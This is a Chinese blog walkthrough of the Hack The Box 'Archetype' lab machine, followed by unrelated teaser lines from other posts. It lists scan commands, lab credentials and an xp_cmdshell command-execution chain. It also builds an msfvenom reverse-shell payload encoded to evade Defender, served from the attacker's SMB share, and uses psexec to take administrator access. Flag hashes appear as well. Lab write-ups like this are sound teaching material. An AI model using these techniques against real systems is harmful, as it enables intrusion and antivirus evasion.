是的!我买ㄌ Hack The Box 的 VIP+,因为我觉得 Try Hack Me 上面的 Windows 题目都太新手不友善了,相较之下, Hack The Box 的 Windows 题目比较多元,所以今天开始我应该都会来玩 Hack The Box 的题目! 官方说这题是 Very Easy,但我个人却觉得有一点小难QQ。
rustscan -a 10.10.10.27 -r 1-65535
nmap -A -p135,139,445,5985,47001,49664,49665,49666,49667,49669,49668 10.10.10.27
SMB 匿名登入
backups
backups 资料夹
取得密码资讯
ARCHETYPE
sql_svc
M3g4c0rp123
sudo apt install python3-impacket
impacket-mssqlclient -p 1433 [email protected] -windows-auth
exec xp_cmdshell '{指令}'
systeminfo
dir
exec xp_cmdshell 'dir'
impacket-smbserver meow .
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.16 LPORT=7877 -e x86/shikata_ga_nai -f exe > shell.exe
x86/shikata_ga_nai
就会被 Defender 吃掉exec xp_cmdshell '\\10.10.16.16\meow\shell.exe'
3e7b102e78218e935bf3f4951fec21a3
windows-exploit-suggester.py
whoami /priv
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
administrator
MEGACORP_4dm1n!!
impacket-psexec administrator:'MEGACORP_4dm1n!!'@10.10.10.27
b91ccec3305e98240082d4474b848528
<<: 【Day 21】- 你的爬虫还在用帐号密码进行登入? 带上 Session 吧!(实战 Selenium 自动点击 Instagram 好友贴文赞 1/2)
好的,连假最後一天,我们来个小篇章,就是Span啦,Span可以做到的事情有很多,如 *更改特定位...
如果有错误,欢迎留言指教~ Q_Q 好的命名,也能够清楚的让人一看就知道是在做什麽 团队有统一的写...
前言 经过昨天一连串得技术 跟程序轰炸 今天想分享一些使用laravel的心得 并且总结昨天的技术 ...
hello~~~ 夥伴们大家好,经过昨天我简单的介绍,希望有让夥伴们对Postman介面上的各个区块...
插播一下, webpack 5 出来了 gulp 是个老牌的 task runner ,它就只是执...